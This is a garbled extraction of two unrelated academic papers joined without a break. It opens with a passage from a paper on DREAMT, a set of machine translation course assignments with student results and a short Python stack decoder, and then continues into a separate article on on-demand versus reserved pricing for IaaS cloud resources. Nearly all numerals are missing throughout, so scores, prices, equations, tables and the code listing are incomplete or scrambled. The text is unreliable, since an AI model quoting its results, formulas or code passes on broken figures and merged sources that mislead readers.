enabled immediate experimentation. on receipt of the code, students were instructed to align the first , sentences and compute aer using a simple command. > align -n | grade by varying the number of input sentences and the threshold for an alignment, students could immediately see the effect of various parameters on alignment quality. we privately implemented ibm model (brown et al., ) as the target algorithm for a passing grade. we ran it for five iterations with english as the target language and french as the source. our implementation did not use null alignment or symmetrization—leaving out these common im- provements offered students the possibility of dis- covering them independently, and thereby rewarded. a e r × - d a y s - d a y s - d a y s - d a y s - d a y s - d a y s - d a y s - d a y s d u e figure : submission history for the alignment challenge. dashed lines represent the default and baseline system performance. each colored line represents a student, and each dot represents a submission. for clarity, we show only submissions that improved the student’s aer. . challenge results we received submissions from teams over a period of two weeks (figure ). everyone eventually matched or exceeded ibm model aer of . . most students implemented ibm model , but we saw many other solutions, indicating that many truly experimented with the problem: • implementing heuristic constraints to require alignment of proper names and punctuation. • running the algorithm on stems rather than sur- face words. • initializing the first iteration of model with parameters estimated on the observed align- ments in the development data. • running model for many iterations. most re- searchers typically run model for five itera- tions or fewer, and there are few experiments in the literature on its behavior over many iter- ations, as there are for hidden markov model taggers (johnson, ). our students carried out these experiments, reporting runs of , , , and even iterations. no improve- ment was observed after iterations. • implementing various alternative approaches from the literature, including ibm model (brown et al., ), competitive linking (melamed, ), and smoothing (moore, ). one of the best solutions was competitive linking with dice’s coefficient, modified to incorporate the observation that alignments tend to be monotonic by restricting possible alignment points to a window of eight words around the diagonal. although simple, it acheived an aer of . , an error reduction over model of more than %. the best score compares unfavorably against a state-of-the-art aer of . (liu et al., ). but under a different view, it still represents a significant amount of progress for an effort taking just over two weeks: on the original challenge from which we ob- tained the data (mihalcea and pedersen, ) the best student system would have placed fifth out of fifteen systems. consider also the combined effort of all the students: when we trained a perceptron clas- sifier on the development data, taking each student’s prediction as a feature, we obtained an aer of . , which would have placed fourth on the original chal- lenge. this is notable since none of the systems incorporated first-order dependencies on the align- ments of adjacent words, long noted as an impor- tant feature of the best alignment models (och and ney, ). yet a simple system combination of stu- dent assignments is as effective as a hidden markov model trained on a comparable amount of data (och and ney, ). it is important to note that aer does not neces- sarily correlate with downstream performance, par- ticularly on the hansards dataset (fraser and marcu, ). we used the conclusion of the assignment as an opportunity to emphasize this point. the decoding challenge the second challenge was decoding: given a fixed translation model and a set of input sentences, stu- dents were challenged to produce translations with the highest model score. this challenge introduced the difficulties of combinatorial optimization under a deceptively simple setup: the model we provided was a simple phrase-based translation model (koehn et al., ) consisting only of a phrase table and tri- gram language model. under this simple model, for a french sentence f of length i, english sentence e of length j, and alignment a where each element consists of a span in both e and f such that every word in both e and f is aligned exactly once, the conditional probability of e and a given f is as fol- lows. p(e,a|f) = ∏ 〈i,i′,j,j′〉∈a p(fi ′ i |e j′ j ) j+ ∏ j= p(ej|ej− ,ej− ) ( ) to evaluate output, we compute the conditional probability of e as follows. p(e|f) = ∑ a p(e,a|f) ( ) note that this formulation is different from the typ- ical viterbi objective of standard beam search de- coders, which do not sum over all alignments, but approximate p(e|f) by maxa p(e,a|f). though the computation in equation is intractable (denero and klein, ), it can be computed in a few min- utes via dynamic programming on reasonably short sentences. we ensured that our data met this crite- rion. the corpus-level probability is then the prod- uct of all sentence-level probabilities in the data. the model includes no distortion limit or distor- tion model, for two reasons. first, leaving out the distortion model slightly simplifies the implementa- tion, since it is not necessary to keep track of the last word translated in a beam decoder; we felt that this detail was secondary to understanding the difficulty of search over phrase permutations. second, it actu- ally makes the problem more difficult, since a simple distance-based distortion model prefers translations with fewer permutations; without it, the model may easily prefer any permutation of the target phrases, making even the viterbi search problem exhibit its true np-hardness (knight, a; zaslavskiy et al., ). since the goal was to find the translation with the highest probability, we did not provide a held-out test set; with access to both the input sentences and for simplicity, this formula assumes that e is padded with two sentence-initial symbols and one sentence-final symbol, and ignores the probability of sentence segmentation, which we take to be uniform. the model, students had enough information to com- pute the evaluation score on any dataset themselves. the difficulty of the challenge lies simply in finding the translation that maximizes the evaluation. in- deed, since the problem is intractable, even the in- structors did not know the true solution. . data we chose french sentences totaling words from the canadian hansards to serve as test data. to create a simple translation model, we used the berkeley aligner to align the parallel text from the first assignment, and extracted a phrase table using the method of lopez ( ), as implemented in cdec (dyer et al., ). to create a simple language model, we used srilm (stolcke, ). . implementation we distributed two python programs. the first, decode, decodes the test data monotonically— using both the language model and translation model, but without permuting phrases. the imple- mentation is completely self-contained with no ex- ternal dependencies: it implements both models and a simple stack decoding algorithm for monotonic translation. it contains only lines of python— orders of magnitude fewer than most full-featured decoders. to see its similarity to pseudocode, com- pare the decoding algorithm (listing ) with the pseudocode in koehn’s ( ) popular textbook (re- produced here as algorithm ). the second pro- gram, grade, computes the log-probability of a set of translations, as outline above. we privately implemented a simple stack decoder that searched over permutations of phrases, similar to koehn ( ). our implementation increased the codebase by lines of code and included param- eters for beam size, distortion limit, and the maxi- mum number of translations considered for each in- put phrase. we posted a baseline to the leaderboard using values of , , and for these, respectively. we implemented a version of the lagrangian relaxation algo- rithm of chang and collins ( ), but found it difficult to obtain tight (optimal) solutions without iteratively reintroduc- ing all of the original constraints. we suspect this is due to the lack of a distortion penalty, which enforces a strong pref- erence towards translations with little reordering. however, the solution found by this algorithm is only approximates the objective implied by equation , which sums over alignments. we also posted an oracle containing the most prob- able output for each sentence, selected from among all submissions received so far. the intent of this oracle was to provide a lower bound on the best pos- sible output, giving students additional incentive to continue improving their systems. . challenge results we received submissions from teams (fig- ure ), again exhibiting variety of solutions. • implementation of greedy decoder which at each step chooses the most probable translation from among those reachable by a single swap or retranslation (germann et al., ; langlais et al., ). • inclusion of heuristic estimates of future cost. • implementation of a private oracle. some stu- dents observed that the ideal beam setting was not uniform across the corpus. they ran their decoder under different settings, and then se- lected the most probable translation of each sentence. many teams who implemented the standard stack decoding algorithm experimented heavily with its pruning parameters. the best submission used ex- tremely wide beam settings in conjunction with a reimplementation of the future cost estimate used in moses (koehn et al., ). five of the submissions beat moses using its standard beam settings after it had been configured to decode with our model. we used this assignment to emphasize the im- portance of good models: the model score of the submissions was generally inversely correlated with bleu, possibly because our simple model had no distortion limits. we used this to illustrate the differ- ence between model error and search error, includ- ing fortuitous search error (germann et al., ) made by decoders with less accurate search. the evaluation challenge the third challenge was evaluation: given a test cor- pus with reference translations and the output of sev- eral mt systems, students were challenged to pro- duce a ranking of the systems that closely correlated with a human ranking. listing the default decoder in dreamt: a stack decoder for monotonic translation. stacks = [{} for _ in f] + [{}] stacks[ ][lm.begin()] = initial_hypothesis for i, stack in enumerate(stacks[:- ]): for h in sorted(stack.itervalues(),key=lambda h: -h.logprob)[:alpha]: for j in xrange(i+ ,len(f)+ ): if f[i:j] in tm: for phrase in tm[f[i:j]]: logprob = h.logprob + phrase.logprob lm_state = h.lm_state for word in phrase.english.split(): (lm_state, word_logprob) = lm.score(lm_state, word) logprob += word_logprob logprob += lm.end(lm_state) if j == len(f) else . new_hypothesis = hypothesis(logprob, lm_state, h, phrase) if lm_state not in stacks[j] or \ stacks[j][lm_state].logprob < logprob: stacks[j][lm_state] = new_hypothesis winner = max(stacks[- ].itervalues(), key=lambda h: h.logprob) def extract_english(h): return "" if h.predecessor is none else "%s%s " % (extract_english(h.predecessor), h.phrase.english) print extract_english(winner) algorithm basic stack decoding algorithm, adapted from koehn ( ), p. . place empty hypothesis into stack for all stacks ...n− do for all hypotheses in stack do for all translation options do if applicable then create new hypothesis place in stack recombine with existing hypothesis prune stack if too big . data we chose the english-to-german translation sys- tems from the and shared task at the an- nual workshop for machine translation (callison- burch et al., ; callison-burch et al., ), pro- viding the first as development data and the second as test data. we chose these sets because bleu (papineni et al., ), our baseline metric, per- formed particularly poorly on them; this left room for improvement in addition to highlighting some lo g p (e |f ) − c - - - - - - d a y s - d a y s - d a y s - d a y s - d a y s - d a y s - d a y s - d a y s - d a y s - d a y s d u e figure : submission history for the decoding challenge. the dotted green line represents the oracle over submis- sions. deficiencies of bleu. for each dataset we pro- vided the source and reference sentences along with anonymized system outputs. for the development data we also provided the human ranking of the sys- tems, computed from pairwise human judgements according to a formula recommended by bojar et al. ( ). . implementation we provided three simple python programs: evaluate implements a simple ranking of the sys- tems based on position-independent word error rate (per; tillmann et al., ), which computes a bag- of-words overlap between the system translations and the reference. the grade program computes spearman’s ρ between the human ranking and an output ranking. the check program simply ensures that a submission contains a valid ranking. we were concerned about hill-climbing on the test data, so we modified the leaderboard to report new results only twice a day. this encouraged students to experiment on the development data before posting new submissions, while still providing intermittent feedback. we privately implemented a version of bleu, which obtained a correlation of . with the human rankings, a modest improvement over the baseline of . . our implementation underperforms the one reported in callison-burch et al. ( ) since it per- forms no tokenization or normalization of the data. this also left room for improvement. . evaluation challenge results we received submissions from teams (fig- ure ), again demonstrating a wide range of tech- niques. • experimentation with the maximum n-gram length and weights in bleu. • implementation of smoothed versions of bleu (lin and och, ). • implementation of weighted f-measure to bal- ance both precision and recall. • careful normalization of the reference and ma- chine translations, including lowercasing and punctuation-stripping. this ranking has been disputed over a series of papers (lopez, ; callison-burch et al., ; koehn, ). the paper which initiated the dispute, written by the first author, was di- rectly inspired by the experience of designing this assignment. s p e a rm a n ’s ρ . . . - d a y s - d a y s - d a y s - d a y s - d a y s - d a y s - d a y s d u e figure : submission history for the evaluation chal- lenge. • implementation of several techniques used in amber (chen and kuhn, ). the best submission, obtaining a correlation of . , relied on the idea that the reference and ma- chine translation should be good paraphrases of each other (owczarzak et al., ; kauchak and barzi- lay, ). it employed a simple paraphrase sys- tem trained on the alignment challenge data, us- ing the pivot technique of bannard and callison- burch ( ), and computing the optimal alignment between machine translation and reference under a simple model in which words could align if they were paraphrases. when compared with the systems submitted to the original task from which the data was obtained (callison-burch et al., ), this system would have ranked fifth, quite near the top-scoring competitors, whose correlations ranged from to . the reranking challenge the fourth challenge was reranking: given a test cor- pus and a large n-best list of candidate translations for each sentence, students were challenged to select a candidate translation for each sentence to produce a high corpus-level bleu score. due to an error our data preparation, this assignment had a simple solution that was very difficult to improve on. nev- ertheless, it featured several elements that may be useful for future courses. . data we obtained -best lists from a spanish-english translation system built with the joshua toolkit (ganitkevitch et al., ) using data and resources from the workshop on machine translation (callison-burch et al., ). we provided training sentences, consisting of source and refer- ence sentences along with the candidate translations. we also included a test set of sentences, for which we provided only the source and candidate translations. each candidate translation included six features from the underlying translation system, out of an original ; our hope was that students might rediscover some features through experimentation. . implementation we conceived of the assignment as one in which stu- dents could apply machine learning or feature engi- neering to the task of reranking the systems, so we provided several tools. the first of these, learn, was a simple program that produced a vector of feature weights using pairwise ranking optimization (pro; hopkins and may, ), with a perceptron as the underlying learning algorithm. a second, rerank, takes a weight vector as input and reranks the sentences; both programs were designed to work with arbitrary numbers of features. the grade pro- gram computed the bleu score on development data, while check ensured that a test submission is valid. finally, we provided an oracle program, which computed a lower bound on the achievable bleu score on the development data using a greedy approximation (och et al., ). the leaderboard likewise displayed an oracle on test data. we did not assign a target algorithm, but left the assignment fully open-ended. . reranking challenge outcome for each assignment, we made an effort to create room for competition above the target algorithm. however, we did not accomplish this in the rerank- ing challenge: we had removed most of the features from the candidate translations, in hopes that stu- dents might reinvent some of them, but we left one highly predictive implicit feature in the data: the rank order of the underlying translation system. stu- dents discovered that simply returning the first can- didate earned a very high score, and most of them quickly converged to this solution. unfortunately, the high accuracy of this baseline left little room for additional competition. nevertheless, we were en- couraged that most students discovered this by acci- dent while attempting other strategies to rerank the translations. • experimentation with parameters of the pro algorithm. • substitution of alternative learning algorithms. • implementation of a simplified minimum bayes risk reranker (kumar and byrne, ). over a baseline of . , the latter approach ob- tained a bleu of . , nearly matching the score of . from the underlying system despite an im- poverished feature set. pedagogical outcomes could our students have obtained similar results by running standard toolkits? undoubtedly. however, our goal was for students to learn by doing: they obtained these results by implementing key mt al- gorithms, observing their behavior on real data, and improving them. this left them with much more in- sight into how mt systems actually work, and in this sense, dreamt was a success. at the end of class, we requested written feedback on the design of the assignments. many commented positively on the motivation provided by the challenge problems: • the immediate feedback of the automatic grad- ing was really nice. • fast feedback on my submissions and my rela- tive position on the leaderboard kept me both motivated to start the assignments early and to constantly improve them. also knowing how well others were doing was a good way to gauge whether i was completely off track or not when i got bad results. • the homework assignments were very engag- ing thanks to the clear yet open-ended setup and their competitive aspects. students also commented that they learned a lot about mt and even research in general: question n/a feedback on my work for this course is useful - - - this course enhanced my ability to work effectively in a team - - compared to other courses at this level, the workload for this course is high - table : response to student survey questions on a likert scale from (strongly disagree) to (strongly agree). • i learned the most from the assignments. • the assignments always pushed me one step more towards thinking out loud how the par- ticular task can be completed. • i appreciated the setup of the homework prob- lems. i think it has helped me learn how to set up and attack research questions in an or- ganized way. i have a much better sense for what goes into an mt system and what prob- lems aren’t solved. we also received feedback through an anonymous survey conducted at the end of the course before posting final grades. each student rated aspects of the course on a five point likert scale, from (strongly disagree) to (strongly agree). several questions pertained to assignments (table ), and al- lay two possible concerns about competition: most students felt that the assignments enhanced their col- laborative skills, and that their open-endedness did not result in an overload of work. for all survey questions, student satisfaction was higher than av- erage for courses in our department. discussion dreamt is inspired by several different ap- proaches to teaching nlp, ai, and computer sci- ence. eisner and smith ( ) teach nlp using a competitive game in which students aim to write fragments of english grammar. charniak et al. ( ) improve the state-of-the-art in a reading com- prehension task as part of a group project. christo- pher et al. ( ) use nachos, a classic tool for teaching operating systems by providing a rudimen- tary system that students then augment. denero and klein ( ) devise a series of assignments based on pac-man, for which students implement several classic ai techniques. a crucial element in such ap- proaches is a highly functional but simple scaffold- ing. the dreamt codebase, including grading and validation scripts, consists of only lines of code (loc) over four assignments: loc for align- ment, loc for decoding, loc for evalua- tion, and loc for reranking. to simplify imple- mentation further, the optional leaderboard could be delegated to kaggle.com, a company that organizes machine learning competitions using a model sim- ilar to the netflix challenge (bennet and lanning, ), and offers pro bono use of its services for educational challenge problems. a recent machine learning class at oxford hosted its assignments on kaggle (phil blunsom, personal communication). we imagine other uses of dreamt. it could be used in an inverted classroom, where students view lecture material outside of class and work on prac- tical problems in class. it might also be useful in massive open online courses (moocs). in this for- mat, course material (primarily lectures and quizzes) is distributed over the internet to an arbitrarily large number of interested students through sites such as coursera.org, udacity.com, and khanacademy.org. in many cases, material and problem sets focus on spe- cific techniques. although this is important, there is also a place for open-ended problems on which stu- dents apply a full range of problem-solving skills. automatic grading enables them to scale easily to large numbers of students. on the scientific side, the scale of moocs might make it possible to empirically measure the effec- tiveness of hands-on or competitive assignments, by comparing course performance of students who work on them against that of those who do not. though there is some empirical work on competi- tive assignments in the computer science education literature (lawrence, ; garlick and akl, ; regueras et al., ; ribeiro et al., ), they generally measure student satisfaction and retention rather than the more difficult question of whether such assignments actually improve student learning. however, it might be feasible to answer such ques- tions in large, data-rich virtual classrooms offered by moocs. this is an interesting potential avenue for future work. because our class came within reach of state-of- the-art on each problem within a matter of weeks, we wonder what might happen with a very large body of competitors. could real innovation oc- cur? could we solve large-scale problems? it may be interesting to adopt a different incentive struc- ture, such as one posed by abernethy and frongillo ( ) for crowdsourcing machine learning prob- lems: rather than competing, everyone works to- gether to solve a shared task, with credit awarded proportional to the contribution that each individual makes. in this setting, everyone stands to gain: stu- dents learn to solve problems as they are found in the real world, instructors learn new insights into the problems they pose, and, in the long run, users of ai technology benefit from overall improvements. hence it is possible that posing open-ended, real- world problems to students might be a small piece of the puzzle of providing high-quality nlp tech- nologies. acknowledgments we are grateful to colin cherry and chris dyer for testing the assignments in different settings and providing valuable feedback, and to jessie young for implementing a dual decomposition solution to the decoding assignment. we thank jason eis- ner, frank ferraro, yoav goldberg, matt gormley, ann irvine, rebecca knowles, ben mitchell, court- ney napoles, michael rushanan, joanne selinski, svitlana volkova, and the anonymous reviewers for lively discussion and helpful comments on previous drafts of this paper. any errors are our own. references j. abernethy and r. m. frongillo. . a collaborative mechanism for crowdsourcing prediction problems. in proc. of nips. c. bannard and c. callison-burch. . paraphrasing with bilingual parallel corpora. in proc. of acl. j. bennet and s. lanning. . the netflix prize. in proc. of the kdd cup and workshop. s. bird, e. klein, e. loper, and j. baldridge. . multidisciplinary instruction with the natural language toolkit. in proc. of workshop on issues in teaching computational linguistics. o. bojar, m. ercegovčević, m. popel, and o. zaidan. . a grain of salt for the wmt manual evaluation. in proc. of wmt. p. e. brown, s. a. d. pietra, v. j. d. pietra, and r. l. mercer. . the mathematics of statistical machine translation: parameter estimation. computational lin- guistics, ( ). c. callison-burch, p. koehn, c. monz, and j. schroeder. . findings of the workshop on statistical machine translation. in proc. of wmt. c. callison-burch, p. koehn, c. monz, and o. zaidan. . findings of the workshop on statistical machine translation. in proc. of wmt. c. callison-burch, p. koehn, c. monz, m. post, r. sori- cut, and l. specia. . findings of the work- shop on statistical machine translation. in proc. of wmt. y.-w. chang and m. collins. . exact decoding of phrase-based translation models through lagrangian relaxation. in proc. of emnlp. e. charniak, y. altun, r. de salvo braz, b. garrett, m. kosmala, t. moscovich, l. pang, c. pyo, y. sun, w. wy, z. yang, s. zeiler, and l. zorn. . read- ing comprehension programs in a statistical-language- processing class. in proc. of workshop on read- ing comprehension tests as evaluation for computer- based language understanding systems. b. chen and r. kuhn. . amber: a modified bleu, enhanced ranking metric. in proc. of wmt. d. chiang. . hierarchical phrase-based translation. computational linguistics, ( ). w. a. christopher, s. j. procter, and t. e. anderson. . the nachos instructional operating system. in proc. of usenix. j. denero and d. klein. . the complexity of phrase alignment problems. in proc. of acl. j. denero and d. klein. . teaching introductory articial intelligence with pac-man. in proc. of sym- posium on educational advances in artificial intelli- gence. l. r. dice. . measures of the amount of ecologic association between species. ecology, ( ): – . c. dyer, a. lopez, j. ganitkevitch, j. weese, f. ture, p. blunsom, h. setiawan, v. eidelman, and p. resnik. . cdec: a decoder, alignment, and learning framework for finite-state and context-free translation models. in proc. of acl. j. eisner and n. a. smith. . competitive grammar writing. in proc. of workshop on issues in teaching computational linguistics. a. fraser and d. marcu. . measuring word align- ment quality for statistical machine translation. com- putational linguistics, ( ). j. ganitkevitch, y. cao, j. weese, m. post, and c. callison-burch. . joshua . : packing, pro, and paraphrases. in proc. of wmt. r. garlick and r. akl. . intra-class competitive assignments in cs : a one-year study. in proc. of international conference on engineering education. u. germann, m. jahr, k. knight, d. marcu, and k. ya- mada. . fast decoding and optimal decoding for machine translation. in proc. of acl. l. huang and d. chiang. . forest rescoring: faster decoding with integrated language models. in proc. of acl. m. johnson. . why doesn’t em find good hmm pos-taggers? in proc. of emnlp. d. jurafsky and j. h. martin. . speech and lan- guage processing. prentice hall, nd edition. d. kauchak and r. barzilay. . paraphrasing for automatic evaluation. in proc. of hlt-naacl. d. klein. . a core-tools statistical nlp course. in proc. of workshop on effective tools and methodolo- gies for teaching nlp and cl. k. knight. a. decoding complexity in word- replacement translation models. computational lin- guistics, ( ). k. knight. b. a statistical mt tutorial workbook. p. koehn, f. j. och, and d. marcu. . statistical phrase-based translation. in proc. of naacl. p. koehn, h. hoang, a. birch, c. callison-burch, m. federico, n. bertoldi, b. cowan, w. shen, c. moran, r. zens, c. dyer, o. bojar, a. constantin, and e. herbst. . moses: open source toolkit for statistical machine translation. in proc. of acl. p. koehn. . pharaoh: a beam search decoder for phrase-based statistical machine translation models. in proc. of amta. p. koehn. . statistical machine translation. cam- bridge university press. p. koehn. . simulating human judgment in machine translation evaluation campaigns. in proc. of iwslt. s. kumar and w. byrne. . minimum bayes-risk decoding for statistical machine translation. in proc. of hlt-naacl. p. langlais, a. patry, and f. gotti. . a greedy de- coder for phrase-based statistical machine translation. in proc. of tmi. r. lawrence. . teaching data structures using competitive games. ieee transactions on education, ( ). p. liang, b. taskar, and d. klein. . alignment by agreement. in proc. of naacl. c.-y. lin and f. j. och. . orange: a method for evaluating automatic evaluation metrics for machine translation. in proc. of coling. y. liu, q. liu, and s. lin. . discriminative word alignment by linear modeling. computational lin- guistics, ( ). a. lopez. . hierarchical phrase-based translation with suffix arrays. in proc. of emnlp. a. lopez. . statistical machine translation. acm computing surveys, ( ). a. lopez. . putting human assessments of machine translation systems in order. in proc. of wmt. n. madnani and b. dorr. . combining open-source with research to re-engineer a hands-on introductory nlp course. in proc. of workshop on issues in teach- ing computational linguistics. i. d. melamed. . models of translational equiv- alence among words. computational linguistics, ( ). r. mihalcea and t. pedersen. . an evaluation ex- ercise for word alignment. in proc. on workshop on building and using parallel texts. r. c. moore. . improving ibm word alignment model . in proc. of acl. f. j. och and h. ney. . improved statistical align- ment models. in proc. of acl. f. j. och and h. ney. . a systematic comparison of various statistical alignment models. computational linguistics, . f. j. och, d. gildea, s. khudanpur, a. sarkar, k. ya- mada, a. fraser, s. kumar, l. shen, d. smith, k. eng, v. jain, z. jin, and d. radev. . a smorgasbord of features for statistical machine translation. in proc. of naacl. k. owczarzak, d. groves, j. v. genabith, and a. way. . contextual bitext-derived paraphrases in auto- matic mt evaluation. in proc. of wmt. k. papineni, s. roukos, t. ward, and w.-j. zhu. . bleu: a method for automatic evaluation of machine translation. in proc. of acl. l. regueras, e. verdú, m. verdú, m. pérez, j. de castro, and m. muñoz. . motivating students through on-line competition: an analysis of satisfaction and learning styles. p. ribeiro, m. ferreira, and h. simões. . teach- ing artificial intelligence and logic programming in a competitive environment. informatics in education, (vol ): . j. spacco, d. hovemeyer, w. pugh, j. hollingsworth, n. padua-perez, and f. emad. . experiences with marmoset: designing and using an advanced submis- sion and testing system for programming courses. in proc. of innovation and technology in computer sci- ence education. a. stolcke. . srilm - an extensible language mod- eling toolkit. in proc. of icslp. c. tillmann, s. vogel, h. ney, a. zubiaga, and h. sawaf. . accelerated dp based search for statistical translation. in proc. of european conf. on speech communication and technology. m. zaslavskiy, m. dymetman, and n. cancedda. . phrase-based statistical machine translation as a trav- eling salesman problem. in proc. of acl. international journal of advanced network monitoring and controls volume , no. , optimal pricing strategies for resource allocation in iaas cloud zhengce cai a, xianwei li*b,c a department of information service, anhui business college, hefei, china, ; b school of information engineering, suzhou university, suzhou, china, ; c global information and telecommunication institute, waseda university, tokyo, japan email: *lixianwei @ .com abstract. in cloud computing environment, pricing is an effective method for resource allocation and it provides efficient incentive for cloud providers to provide cloud services. in this paper, we investigate two pricing schemes for the allocation of cloud resources in a monopoly cloud market subject to constrained capacity of the cloud provider. there are two main pricing schemes, on-demand and reserved pricing mechanisms adopted by leading cloud providers, i.e., amazon and gogrid. we analyze how cloud users make their choice decisions to subscribe to cloud resources under different pricing schemes. keywords: cloud computing, pricing schemes, resource allocation, revenue, utility . introduction cloud computing has received a great deal of attention in both research and engineering fields, and the use of cloud services has become more and more wide. fig . illustrates the application of cloud services [ ]. the definition of cloud computing is an open topic and it can be defined by several ways, one popular recognized definition proposed by buyya et al. [ ] is: computers that are dynamically provisioned and presented as one or more unified computing resources based on “a cloud is a type of parallel and distributed system consisting of a collection of interconnected and virtualized service-level agreements established through negotiation between the service provider and the consumers. cloud services can be categorized into three main types [ ][ ], infrastructure as a service (iaas), software as a service (saas) and platform as a service (paas), among which iaas and saas are more commonly used, therefore, most of the current works focus on study resource allocation in iaas and saas clouds. in iaas cloud context, such as amazon ec , physical resources (memory, disk, and cpu et al) are virtualized into different types of virtual machines (vms), and the computational resources are leased to cloud users in the form of vm instances, as shown in fig . . table i shows some configurations of vm instances in amazon ec . in paas cloud context, such as google app engine, cloud users can develop and run their applications on a computing platform. in saas cloud context, cloud users can access the applications which are delivered over the internet. optimal pricing strategies for resource allocation in iaas cloud the rest of the paper is organized as follows. in the second section, we study optimal pricing for revenue maximization by making use of game theory to investigate the relationship between cloud provider and users. we do simulations to verify our analysis in the third section. conclusions and future works are given in the last section. figure. the uses application of cloud services [ ]. figure. an illustration of iaas cloud . pricing for revenue maximiztion we study optimal pricing for revenue maximization in a monopoly cloud market in this section. first, we analyze how to make choice decision given different prices and pricing schemes of vm instances. then, we will study how to set optimal prices in order to maximize the revenue of cloud providers while meeting cloud users’ satisfactions. . cloud users’ choice with different pricing schemes as illustrated in table ii and table iii, even for the same type of instance, cloud users have to make a decision about how to choose the suitable pricing schemes. in order to help cloud users make right decisions, we first analyze which pricing scheme cloud users should choose. suppose that a cloud user wants to buy t hours to process his/her service requests. take m .small vm instance of amazon ec as an example, the price that he/she has to pay is $ . t, and the reservation price per month is $ . . by setting . t= . , we can get t ≈ hours. this means that if total time of the usage of the m .small vm instance are less than hours in one month, it is better for this cloud user to adopt on- demand pricing scheme, otherwise, it is better for this cloud user to adopt reservation pricing scheme. if this cloud user choose to buy the similar type of vm instance in gogrid, for example, x-small, the international journal of advanced network monitoring and controls volume , no. , total money that he/she has to pay is . t under on-demand pricing scheme, and the reservation price is $ . per month, by setting . t= . , we get t ≈ hours. this means that if total time of the usage of the x-small vm instance are less than hours in one month, it is better for this cloud user to adopt on-demand pricing scheme, otherwise, it is better for this cloud user to adopt reservation pricing scheme. we summarize the above analysis results in table iv. fig . further illustrates the adoption option under on-demand and reservation pricing schemes. . cloud users’ decision choices we next study how how to set optimal prices in order to maximize the revenue of cloud providers while meeting cloud users’ satisfactions. assume that there is a cloud provider with total capacity c selling cloud resources in the form of vm instances to a potential number of cloud users, and the price of per vm instance is charged with p $/h under on-demand pricing scheme. each cloud user is denoted by θ, which is uniformly distributed in [ , ]. table configurations of amazon ec vm instances table prices of some amazon ec vm instances instance types cpu storage (gb) memory (gib) m .small . m .large * . m .xlarge . m .xlarge . c . xlarge instance types on-demand pricing(hourly) reservation pricing(monthly) m .small $ . /h $ . /m m .large $ . /h $ . /m m .xlarge $ . /h $ . /m m .xlarge $ . /h $ . /m c . xlarge $ . /h $ . /m optimal pricing strategies for resource allocation in iaas cloud table choice decision for cloud users we model the interactions between cloud providers and users as a stakelberg game [ ], which is illustrated in fig . in the first stage, cloud provider makes their price decisions, and in the second stage, cloud users make their selection decision choices. we make use of the backward method and first analyze cloud users’ decision choices. given the price of that vm instance p, a cloud user that requires xi vm instances will pay pxi, and his/her net benefit can be expressed as θu(xi) – pxi ( ) where u(xi) is the utility that this cloud user gets. we model u(xi) by the following utility function which is widely used in the literature [ ], u(xi)= xiα ( ) where α is an elasticity parameter, which lies in ( , ). fig. illustrates how users’ utilities vary with different values of α. from this figure we can observe that α reflects the elastic demand of this cloud user, that is, the percentage change of demand to the percent change of price, and cloud user will get more utility if the value of the elastic parameter is higher. it is known that the elasticity of the above utility function is /( -α). for the cloud users, they will choose to subscribe cloud resources if and only if their net benefits are nonnegative, which implies that, θxα – px ≥ , ( ) from which we can obtain a critical value θ , and the cloud users whose values are distributed in [ , θ ] will not to subscribe to the cloud resources, and the users whose values are distributed in [θ , ] will choose to use the cloud services. the cloud users’ problem can be expressed by ( ) –ax[ ]m u x pxθ ( ) s.t. x ≥ instance types hourly monthly m .small usage < hours usage hours x-small usage < hours usage hours medium usage < hours usage hours large usage < hours usage hours x-large usage < hours usage hours international journal of advanced network monitoring and controls volume , no. , figure. illustration the adoption option. figure. stakelberg game in the monopoly cloud market. . cloud provider’s pricing decision we will study how to set optimal prices in order to maximize the revenue of cloud providers while meeting cloud users’ satisfactions in this subsection. pricing provides an economic incentive for cloud providers and it ensures the success of cloud computing. for the cloud provider, its objective is to maximize its revenues, which is the total pay from cloud users. the cloud provider’s problem can be formulated as follows, max n i i p xπ = = ∑ ( ) s.t. n i i x c = ≤∑ ( ) – i iu x pxθ ≥ xi ≥ the first constraint of problem ( ) ensures that the total number of vm instances should not be over the capacity of this cloud provider, and the second constraint is to make sure that cloud users’ net benefit is nonnegative. from the observation of the second constraint of problem ( ), we can find that ( )i ipx u xθ= should be satisfied to be optimal. otherwise, the cloud provider can increase the price of this type of vm instance. therefore, we can transform the problem ( ) into an equivalent problem, optimal pricing strategies for resource allocation in iaas cloud ( ) max i n i u xθπ = = ∑ ( ) s.t. n i i x c = ≤∑ xi ≥ now we get the cloud provider’s revenue maximization problem, and we will do simulations to verify our analysis in the next section. . simulation results in this section, we will do simulations to verify our analysis in the previous section. we first analyze users’ decision choices, and then analyze cloud provider’s revenue problem. . cloud users’ utilities we first analyze how cloud users are sensitive to the prices of cloud resources. fig. illustrates how cloud users’ net benefits vary with different values of θ with x= , p= . and α= / . we can observe from fig. that not all the cloud users can get net benefit, therefore, some cloud users may not choose to subscribe to the cloud resources. the parameter θ reflects cloud users’ willing to pay, which means that users with higher value of θ will be more willing to use cloud services. fig. illustrates how cloud users’ net benefits vary with the price charged by cloud provider with θ and other parameters are set the same as in fig. . we can observe that with price increasing, the net benefit of this cloud user will get less net benefit, and this implies that in order to encourage cloud users to use cloud services, cloud providers should set prices of cloud resources properly, otherwise, higher prices will discourage cloud users to pay to use cloud services. . conclusions and future works fwe studied resource allocation in a monopoly cloud market. we analyzed the choice decisions of cloud users in the amazon ec and gogrid clouds, and pointed out the right choice for cloud users when face on-demand and reservation pricing schemes. we not only analyzed how cloud users’ utilities and net benefits vary with different types of cloud users and different number of vm instances, but also analyzed how the revenue of cloud provider varies with different prices and different number of vm instances. future works will include resource allocation in a duopoly or oligopoly cloud market where there are more than one cloud providers. figure. how cloud users’ utilities vary with different values of α. international journal of advanced network monitoring and controls volume , no. , figure. how cloud users’ net benefits vary with different values of θ. figure. how cloud users’ net benefits vary with price of cloud resources p. . cloud provider’s revenue problem we next analyze how the cloud provider sets its prices in order to maximize its revenue. from eqs. ( ) and ( ) we know that the revenue of cloud provider is affected by cloud users’ choices, and we transform the revenue function into a function associated with cloud users’ utilities. fig. shows that the revenue of the cloud provider varies with different number of vm instances, and the revenue will be higher if the price is set higher with the same number of vm instances. fig. shows that cloud users are more willing to subscribe cloud services if they have higher values for using cloud services, and if cloud users have more elastic demand for cloud services, cloud provider will get more revenue. the above analysis imply that cloud provider can set higher prices for these cloud users who are more willing to pay and who have higher elastic demands. figure. the revenues of cloud provider vary with different number of vm instances. optimal pricing strategies for resource allocation in iaas cloud figure. the revenues of cloud provider vary with different cloud users’ types. acknowledgment this paper is supported by the following projects, anhui key research projects of humanities and social sciences 